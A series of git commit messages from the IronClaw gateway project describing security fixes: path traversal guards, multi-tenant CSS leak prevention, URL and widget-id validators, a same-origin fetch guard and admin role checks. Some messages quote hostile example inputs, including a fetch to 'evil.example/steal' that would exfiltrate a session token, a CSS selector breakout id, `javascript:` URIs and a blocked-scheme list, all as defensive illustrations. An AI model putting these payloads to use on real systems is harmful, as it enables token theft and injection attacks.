doesn't normalize `.`/`..`/backslash/NUL components would have allowed a widget directory called `..` (or with embedded separators) to escape the `.system/gateway/widgets/` subtree. The natural chokepoint is `read_widget_manifest` itself — both call sites already route through it for the `manifest.id == directory_name` check, so adding a single `is_safe_segment(directory_name)` guard at the top of that function fixes both call paths at once. Same validator the public `/api/frontend/widget/{id}/{*file}` endpoint already enforces, so widget *discovery* is now in line with widget *serving*. Regression test `skips_widget_with_unsafe_directory_name` covers `..`, `.`, embedded `/`, embedded `\`, and embedded NUL — five distinct rejection vectors. Probes `read_widget_manifest` directly so it covers both call sites with one tokio test. **3. `layout_has_customizations` over-triggers on empty branding colors** (`src/channels/web/server.rs`). Treating `branding.colors.is_some()` as a customization forced the per-response nonce CSP path even when both `primary` and `accent` were `None` or whitespace-only (which the `is_safe_css_color` validator strips at injection time). Replaced with a `has_branding_colors` check that requires at least one trimmed-non-empty color field, mirroring what `BrandingConfig::to_css_vars` actually emits. No security impact, just removes a pointless slow path that produced zero effective branding output. **4. FRONTEND.md "eval-equivalent constructs" claim was factually wrong** (`src/workspace/seeds/FRONTEND.md:71`). The Security model section told operators that widgets can use "`eval`-equivalent constructs that don't trip the CSP". The gateway CSP does NOT include `'unsafe-eval'`, so `eval()`, `new Function()`, and string-form `setTimeout` / `setInterval` are all blocked by the browser. Rewrote the sentence to describe what widgets *actually* have access to: `IronClaw.api.fetch` against same-origin endpoints, full DOM mutation, event listeners on the chat input, and dynamic `import()` from any origin allowed by the gateway's `script-src` (`'self'`, jsDelivr, cdnjs, esm.sh). The CSP narrows the *shape* of attacks a widget can mount, not the blast radius — the real trust boundary is still `memory_write` access to the workspace. **5. Bare-string `replace(NONCE_PLACEHOLDER, ...)` could mutate widget bodies** (`src/channels/web/server.rs`). `index_handler` previously did `html.replace(NONCE_PLACEHOLDER, &nonce)` to swap the per-response nonce into the assembled HTML. A widget author who wrote the literal string `__IRONCLAW_CSP_NONCE__` in their own JS — in a comment, log line, test fixture, or string constant — would have had their source silently mutated into a per-request nonce, breaking the widget in a way that's nearly impossible to debug. Extracted `stamp_nonce_into_html(html, nonce)` helper that targets the full attribute form `nonce="__IRONCLAW_CSP_NONCE__"` instead of the bare placeholder. The double-quoted sentinel is unambiguous in HTML context — it can never accidentally match free text in a JS module body, a comment, or a JSON payload. Two regression tests: - `test_stamp_nonce_into_html_replaces_attribute` — vanilla happy path, attribute on a `<script>` tag is rewritten. - `test_stamp_nonce_into_html_does_not_mutate_widget_body` — builds a fragment with TWO sentinels: one in the legitimate attribute (must be replaced) and one in the script body as a `const SENTINEL = "..."` constant (must NOT be replaced). Asserts the attribute was rewritten, the body sentinel survived intact, and exactly one occurrence of the placeholder remains in the result. A future regression to a bare-string replace would drop the body occurrence count to 0 and fail loudly with the diff. **6. `mock_llm._normalize_tool_calls` would crash on non-dict list elements** (`tests/e2e/mock_llm.py`). The function called `item.get(...)` on every list element with no shape check. A future `TOOL_CALL_PATTERNS` entry that accidentally returned a list of tuples / strings / `None` would crash mid-request with an opaque `AttributeError: 'tuple' object has no attribute 'get'` deep inside aiohttp's request handler, taking the whole mock server down for every test in the same `pytest` invocation. Added `isinstance` guards on both the list element AND its `arguments` field, plus a similar guard on the single-call branch. Each raises a clear `TypeError` naming the offending tool, the list index, and the unexpected type — so a malformed pattern fails at the exact line of the offense rather than as collateral damage three frames deep in aiohttp. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib channels::web` — 338 passed (was 335; +3 for the new tests: `test_stamp_nonce_into_html_replaces_attribute`, `test_stamp_nonce_into_html_does_not_mutate_widget_body`, `skips_widget_with_unsafe_directory_name`) - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed - `python3 -m py_compile tests/e2e/mock_llm.py` clean Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 serrrfirat round 2 (multi-tenant CSS + URL validation) Two new findings from the latest serrrfirat review pass on PR #1725. A third finding (NONCE_PLACEHOLDER global replace mutating widget bodies) was already resolved in 56c43f56 — `stamp_nonce_into_html` is attribute-targeted with regression tests `test_stamp_nonce_into_html_ replaces_attribute` and `test_stamp_nonce_into_html_does_not_mutate_ widget_body` already locking the contract. **1. Medium — `css_handler` missing multi-tenant guard** (`src/channels/web/server.rs`). When I fixed `build_frontend_html` in b9da40e7 to refuse the customization assembly path under `workspace_pool.is_some()`, I missed the sibling `css_handler` — which still read `state.workspace` unconditionally to layer `.system/gateway/custom.css` onto `/style.css`. Same shape as the index leak: in multi-tenant mode the CSS handler would serve one operator's custom.css to every other tenant via the unauthenticated `/style.css` bootstrap route. Now mirrors the sibling guard: let css = if state.workspace_pool.is_some() { Cow::Borrowed(assets::STYLE_CSS) // refuse overlay path } else { // ... existing single-tenant overlay path }; The early return bypasses the workspace read entirely, so the hot path stays allocation-free (`Cow::Borrowed`). Per-user CSS overrides can ride a future authenticated `/api/frontend/custom-css` endpoint that routes through `resolve_workspace(&state, &user)`, mirroring the same follow-up plan for `/api/frontend/layout`. Regression test `test_css_handler_returns_base_in_multi_tenant_mode` (libsql-gated): seeds a global workspace with hostile-looking custom.css containing the literal string `TENANT-LEAK-BAIT`, attaches both the workspace AND a `WorkspacePool` to the GatewayState via `Arc::get_mut`, hits `/style.css` via `tower::ServiceExt::oneshot`, and asserts: 1. The bait marker is absent from the response body (catches a future regression that re-reads `state.workspace` in multi-tenant mode — the leaked content would land in the diagnostic). 2. The response body equals `assets::STYLE_CSS` byte-for-byte (catches a subtler regression where the leak content is dropped but the multi-tenant path still does the owned `format!`, breaking the borrowed hot-path optimization). Both contracts are independent — a future regression breaking either alone is still caught. **2. Medium — `logo_url` / `favicon_url` not validated** (`crates/ironclaw_gateway/src/layout.rs`). `BrandingConfig` had defense-in-depth for color values via `is_safe_css_color`, but URL fields accepted arbitrary strings. There's no current consumer in the `app.js` IIFE (the layout-config block doesn't read them yet), so no current vulnerability — but they're exposed via `GET /api/frontend/layout` and the `window.__IRONCLAW_LAYOUT__` JSON island, so the first consumer that renders them as `<img src="…">` or `<link rel="icon" href="…">` would inherit a latent footgun: `javascript:` URI XSS, `data:` URI payload stash, tracking-pixel exfiltration via attacker-controlled domains. Added `is_safe_url(value: &str) -> bool` validator (`pub(crate)`, mirroring `is_safe_css_color`) that accepts: - HTTPS / HTTP absolute URLs (HTTP allowed for intranet/dev usability — gateway enforces TLS at the network layer) - Site-relative paths (`/static/logo.png`) — must start with a single `/`, NOT `//` (protocol-relative URLs are scheme-flippable in the browser URL parser and historically a CSP-bypass source) And rejects: - `javascript:`, `data:`, `vbscript:`, `file:`, `blob:`, any other non-HTTP(S) scheme - HTML attribute breakout vectors (`<`, `>`, `"`, `'`, backtick, backslash) - Control chars (NUL, newline, CR, tab) for copy-paste smuggling defense - Empty / whitespace-only / > 2048 bytes (matches the de-facto Chrome / Apache URL length cap) Added `BrandingConfig::safe_logo_url(&self) -> Option<&str>` and `safe_favicon_url(&self) -> Option<&str>` getters that return `None` when the underlying field fails validation. This is the contract any future consumer must use — routing through the getter keeps validation at the type layer so a future caller can't accidentally bypass it by reading the raw `Option<String>` field. Updated `layout_has_customizations` in server.rs to call the new getters instead of `b.logo_url.is_some()` / `b.favicon_url.is_some()`, mirroring the precedent set for branding colors: a `layout.json` that only sets `logo_url: "javascript:alert(1)"` (and nothing else) no longer triggers the customized HTML path because the value gets dropped at the validator. Symmetric with how empty branding colors are gated. Tests in `layout::tests`: - `test_is_safe_url_accepts_common_forms` — HTTPS, HTTP, site-relative, leading/trailing whitespace - `test_is_safe_url_rejects_injection_vectors` — full classifier sweep: `javascript:` (case-insensitive), `data:`, `vbscript:`, `file:`, `blob:`, protocol-relative `//`, every HTML breakout char, every control char, empty, whitespace-only, length cap (asserts both the 2049-char rejection AND the 2048-char limit boundary), no-scheme bare hostname, single `/` root path - `test_branding_safe_logo_url_filters_invalid` — round-trip contract: safe values pass through, hostile values return None, absent values return None - `test_branding_safe_favicon_url_filters_invalid` — same contract for the parallel field so a future consumer can never accidentally route favicon through a bypass while logo is correctly validated Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test -p ironclaw_gateway` — 56 unit + 1 doctest passed (was 52; +4 for the URL validator tests) - `cargo test --no-default-features --features libsql --lib channels::web` — 339 passed (was 338; +1 for the css_handler multi-tenant guard test) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 paranoid review round 3 (7 findings) Seven items from serrrfirat's third paranoid-architect pass on PR #1725. Two HIGH (token exfil + chat-renderer DOM bypass), three MEDIUM (widget id CSS injection + admin role on layout write + URL field visibility), one LOW (workspace path leak in 404), and one test coverage gap (CSP nonce e2e). Five "verified fixed" items from the audit need no code change — replied separately on the audit thread. **P-JS2 (HIGH) — IronClaw.api.fetch same-origin guard** (`crates/ironclaw_gateway/static/app.js`). The widget API's `fetch` method injected the session `Authorization: Bearer <token>` into *any* URL, including absolute cross-origin URLs. A widget calling `IronClaw.api.fetch('https://evil.example/steal')` would have exfiltrated the user's session token. Now resolves `path` against `window.location.origin` and rejects with a `TypeError` if the resulting origin differs from the gateway's. Same-origin and relative paths still work; site-relative `/api/foo`, `https://<this-host>/api/foo`, and other intra-origin shapes pass through unchanged. The error message names both the requested origin and the expected origin so the widget author sees the misuse at the offending call site. **P-JS1 (HIGH) — sanitize after registerChatRenderer callback** (`crates/ironclaw_gateway/static/app.js`). `renderMarkdown` runs `sanitizeRenderedHtml` (DOMPurify) on its output BEFORE `upgradeStructuredData` invokes registered chat renderers. A renderer's `render(contentEl, ...)` callback receives the live `.message-content` DOM element and can call `contentEl.innerHTML = '<form action="https://attacker">...'`, bypassing the sanitization step entirely. CSP blocks `<script>` execution either way, but form / iframe / object / clickjack-overlay injection still works. Now re-runs `sanitizeRenderedHtml` on `contentEl.innerHTML` after the renderer returns. DOMPurify is idempotent on already-safe HTML so the cost on the happy path is bounded by the sanitizer's walk of the post-renderer subtree. **P-W4 + P-H10 (MEDIUM) — widget id charset validation** (`crates/ironclaw_gateway/src/layout.rs`, `src/channels/web/handlers/frontend.rs`). `scope_css` raw-interpolates the widget id into `[data-widget="<id>"]` with no escape pass; a manifest id like `x"],.evil{color:red}[x` would close the attribute selector and inject arbitrary CSS rules. The HTML attribute side is already protected by `escape_html_attr`, but defense-in-depth at the type level closes both vectors and protects every future call site that interpolates the id without thinking about it. Added `is_safe_widget_id(s) -> bool` (`pub` in `layout.rs`, re-exported from `lib.rs`): `^[a-zA-Z0-9][a-zA-Z0-9._-]*$`, ≤64 chars. The first-char-must-be-alphanumeric rule means an id can't look like an option flag (`-foo`), a hidden file (`.foo`), or a separator fragment. Enforced at the chokepoint `read_widget_manifest` in `handlers/frontend.rs` alongside the existing `is_safe_segment(directory_name)` check, so a hostile manifest is rejected at load time before any rendering layer (CSS, HTML, path composition) sees the id. The reject-then-mismatch-check ordering matters: a hostile id is logged as "unsafe charset" rather than as a directory mismatch, which is the more useful diagnostic. Two new test layers: - `is_safe_widget_id_accepts_existing_fixtures` — every widget id used in test fixtures and FRONTEND.md examples must remain valid. Narrowing the regex after these have shipped would be a breaking change, so this test pins the contract. - `is_safe_widget_id_rejects_injection_payloads` — full sweep: serrrfirat's CSS-selector breakout payload, HTML attribute breakouts, path traversal vectors, whitespace, control chars, non-ASCII, leading non-alphanumeric, empty, and the 64-char boundary (64 passes, 65 fails). - `widget_loader::skips_widget_when_manifest_id_fails_charset_check` — end-to-end regression: write a manifest with the CSS-selector breakout id under a directory name that DOES pass `is_safe_segment`, and verify both `read_widget_manifest` and `load_resolved_widgets` reject it. Catches a future regression that moves the check away from the chokepoint. **P-H9 (MEDIUM) — AdminUser on layout write endpoint** (`src/channels/web/handlers/frontend.rs`). `frontend_layout_update_handler` used `AuthenticatedUser` (any role), so a `member`-role token holder could rewrite the global layout in single-tenant mode — changing branding, hiding tabs, disabling widgets for every user of the gateway. Switched to `AdminUser`. In multi-tenant mode this still scopes per-user via `resolve_workspace`, so admins configuring their own tenant get the expected behavior; member tokens are now denied at the role gate the same way they're denied for user management and secrets management. `AdminUser` is a `pub struct AdminUser(pub UserIdentity)` so the existing `&user` argument to `resolve_workspace` works without changes — added it to the existing `use ...auth::{...}` import alongside `AuthenticatedUser`. **P-L3 (MEDIUM) — sanitize URL fields on serialize + downgrade visibility** (`crates/ironclaw_gateway/src/layout.rs`). `safe_logo_url` / `safe_favicon_url` getters existed with proper `is_safe_url` validation, but the underlying `pub Option<String>` fields were directly accessible — both for Rust callers (who could read them by name without going through the validator) and for the JS side via the `window.__IRONCLAW_LAYOUT__` JSON island, which serializes the raw struct. A future consumer rendering `<a href="${layout.branding.logo_url}">` would inherit the `javascript:` URI XSS that the safe getter is supposed to prevent. Two-part fix: 1. Downgraded `logo_url` and `favicon_url` to `pub(crate)`. All existing constructors are intra-crate (verified by grep), so no public API breakage. External Rust callers must now route through the safe getters by construction. 2. Added `skip_unsafe_url` serde predicate (`#[serde(skip_serializing_if = "skip_unsafe_url")]`) that drops the field from JSON output when the value is missing, empty, or fails `is_safe_url`. Closes the wire-format leg: even if a future intra-crate caller bypasses the getters and writes a hostile value into the field directly, the JSON shipped to the JS side and to `GET /api/frontend/layout` simply omits the field entirely. No `null`, no `javascript:` payload, nothing for a future consumer to inadvertently render. The first iteration tried `serialize_with` for the same job, but that runs *after* `skip_serializing_if` so a hostile value serialized as `null` instead of being skipped. Predicate-side filtering is the correct shape — `skip_unsafe_url` returns `true` on every "drop the field" branch and `false` only when the value is present-and-safe. Two new tests pin both the wire format and the happy path: - `branding_serialize_drops_hostile_urls` — serializes a config with `javascript:` and `data:` URIs and asserts the resulting JSON contains neither `logo_url` nor `favicon_url` keys, AND that the hostile payload strings don't appear anywhere in the output. - `branding_serialize_preserves_safe_urls` — round-trip check: `https://example.com/logo.png` and `/favicon.ico` survive serialization unchanged so legitimate operator branding still reaches the JS side. **P-H1 (LOW) — strip workspace path from widget 404 error** (`src/channels/web/handlers/frontend.rs`). The handler returned `format!("Widget file not found: {path}")`, leaking the resolved `.system/gateway/widgets/{id}/{file}` path back to the caller. That gives an attacker a free oracle for "what directories exist" inside the workspace. Now returns the generic message `"Widget file not found"` and logs the full path internally via `tracing::warn!` so debugging a 404 still works. …
- Remove overly-broad custom element regex that incorrectly stripped non-HTML like <commit-hash>, <pre-condition> (review comment #3) - Replace allowlist-only approach with two-pass catch-all: preserve Rust/Java generics via placeholder substitution, then strip all remaining HTML-like tags including unknown/future tags and custom elements (review comment #2) - Fail-closed on regex compilation failure already implemented; this commit also covers the catch-all regex path (review comment #1) - Change tracing::warn! to tracing::debug! in background routine engine to avoid corrupting REPL/TUI display (review comment #4) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Critical fixes: - Use DB-first config system for MissionsConfig instead of raw std::env::var in router.rs (issue #1) - SessionSummaryHook now uses thread_ids from HookEvent::SessionEnd to summarize the correct conversation instead of guessing via recency; falls back to most-recent for backward compatibility (#2) - Add per-user rate limiter (10/min, 60/hr) and 15s timeout on reasoning LLM calls in MemorySearchTool to prevent unbounded usage (#3) Test coverage: - Caller-level tests for reasoning-augmented recall (LLM wiring, disabled config, and failure fallback paths) (#4) - SessionSummaryHook LLM failure path test confirming fail-open behavior (#5) - reasoning_enabled config field tests (default, env, DB override) (#6) - MissionSettings and SearchSettings round-trip assertions in comprehensive_db_map_round_trip (#11) Convention fixes: - Remove double env-var parsing in MissionsConfig::resolve (#7) - Use ChatMessage::system()/user() constructors in SessionSummaryHook (#8) - Add TODO comments for inline prompt strings (#9) - Add timeout on reasoning LLM call (#10) CI fixes: - Remove 4 stale wasmtime advisory entries from deny.toml - Add RUSTSEC-2026-0097 (rand 0.8.5) to advisory ignore list Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…, binary writes - Add pre-intercept safety param validation so sandbox-dispatched calls go through the same checks as host-dispatched calls (#1) - Set network_mode: "none" on sandbox containers to prevent outbound network access (#3) - Reject binary content in containerized write instead of silently corrupting via from_utf8_lossy (#5) - Cap list_dir depth to 10 to prevent unbounded traversal (#8) - Change container creation log from info! to debug! to avoid breaking REPL/TUI output (#10) - Make is_truthy case-insensitive so SANDBOX_ENABLED=True works (#11) - Return error instead of unwrap_or_default for missing container ID (#12) - Propagate set_permissions errors instead of silently ignoring (#13) - Return error for missing daemon output key instead of defaulting to empty object (#14) - Add env mutex guard in sandbox_live_e2e test (#15) - Fix rustfmt formatting for let-chain in canonicalize_under_root Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…1963) * feat(web): add admin management panel * fix(web): address admin panel review findings * fix(web): address remaining admin review feedback * refactor(web): type admin api responses * fix(db): aggregate admin usage summary in sql * Add audit logging for admin privileged state-changes Add structured tracing (warn-level) to suspend, activate, delete, and update handlers so that privileged admin actions are recorded with the acting admin's user_id, the action performed, and the target user. Addresses security assessment item #1 from PR review. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * Fix PairingStore::new() call in test after staging merge Use PairingStore::new_noop() since the test doesn't need a real DB. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(admin): address PR #1963 review feedback - Fix total_jobs semantics: query agent_jobs directly instead of counting via LEFT JOIN on llm_calls (which missed jobs without LLM calls). Fixed in both libSQL and PostgreSQL backends. - Fix showConfirmModal XSS: escape message parameter internally instead of relying on callers to sanitize. - Add explicit ::numeric cast to PG COALESCE(SUM(cost), 0) to prevent integer type inference. - Use info! instead of warn! for successful admin audit events (update, suspend, activate, delete) — warn implies anomaly. - Add missing index on llm_calls.created_at for both PG (V21 migration) and libSQL (incremental migration 21). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * Address remaining admin panel review follow-ups * fix: address review comments — query consolidation, CSP, docs, security notes - Collapse 4 redundant llm_calls subqueries into single subquery (libsql + pg) - Add WARNING to V21 migration about table lock risk with CONCURRENTLY note - Add performance doc comments on admin_usage_summary full-table scan - Add CSP and noindex meta tags to admin.html - Add JSDoc for showConfirmModal documenting auto-escaping - Add sessionStorage threat model security comment - Add serde(flatten) collision risk doc on AdminUserDetailResponse - Add TODO(#1968) for inline styles migration to CSS custom properties - Add PG parity test stub for admin_usage_summary Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: renumber migration from V21/23 to V24 to avoid conflicts with staging Staging added V21 (backfill_conversation_source_channel), V22 (sandbox_restart_params), and V23 (list_workspace_files_escape_like). Renumber our llm_calls_created_at_index migration to V24 in both PG and libSQL. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: address review feedback — CSP, logging, validation, dispatch-exempt, tests - Remove 'unsafe-inline' from script-src CSP; move CSP to HTTP response header - Change audit tracing::info! to tracing::debug! (TUI corruption) - Add dispatch-exempt annotation on usage_summary_handler - Add server-side input validation on users_create_handler (name length, email, role) - Rename detailRowHtml to detailRowRawHtml with XSS safety comment - Add real PG integration test for admin_usage_summary with non-zero data Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(ci): skip test-only directories in no-panics check Files under `src/**/tests/*.rs` are Rust test sub-modules included behind `#[cfg(test)]` — they are never compiled in production builds. The no-panics checker was flagging `.unwrap()` and `assert!()` in helper functions at module level in these files as production code. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(admin): scope cost aggregates to 30d, drop external fonts, flatten detail response Addresses review feedback on #1963: - Scope all llm_calls aggregates to the 30d `since` window so the admin dashboard query is served by `idx_llm_calls_created_at` rather than a full table scan. Drops the unused all-time `total_cost` subquery from both libsql and postgres backends. - Self-contain the admin SPA — remove `fonts.googleapis.com` / `fonts.gstatic.com` link tags from admin.html and tighten the admin CSP to fully same-origin. Typography degrades to the system-font fallback already listed in `font-family`. - Fold `metadata` into `AdminUserInfo` (optional, skip-if-none) and remove the `#[serde(flatten)]` wrapper, eliminating the documented collision risk. - Add regression test asserting `since` actually bounds the LLM aggregates (future `since` should yield zero LLM counts without affecting non-windowed counts). --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Co-authored-by: ilblackdragon@gmail.com <ilblackdragon@gmail.com>
…rs, tighten tests - propagate_approval: propagate on_start() error as ActivationFailed instead of swallowing it (zmanian review #1) - router.rs: move test-only HashMap import into mod tests (zmanian #2) - chat.rs: remove duplicate clear_auth_mode (Copilot review #1) - e2e: strengthen auth-token assertion to check status 200 + success field, remove overlapping test_auth_cancel_returns_success (Copilot #2/#3) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…ove backup/restore (#2389) - Remove `DatabaseConfigBackup` struct and backup/restore methods; reorder quick-mode flow so profile selection runs before `auto_setup_database()`, letting the existing clone→try_load→merge_from pattern preserve wizard-chosen DB settings naturally (henrypark133). - Add comment explaining the cfg-gated `loaded` variable shadowing in `try_load_existing_settings` (zmanian #1). - Change catch-all `_ =>` to explicit `1 => ... _ => unreachable!()` in profile match arm (zmanian #3). - Add caller-level test verifying profile application preserves DB config through the merge_from cycle (henrypark133 testing feedback). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
All WASM channel sources are now in channels-src/: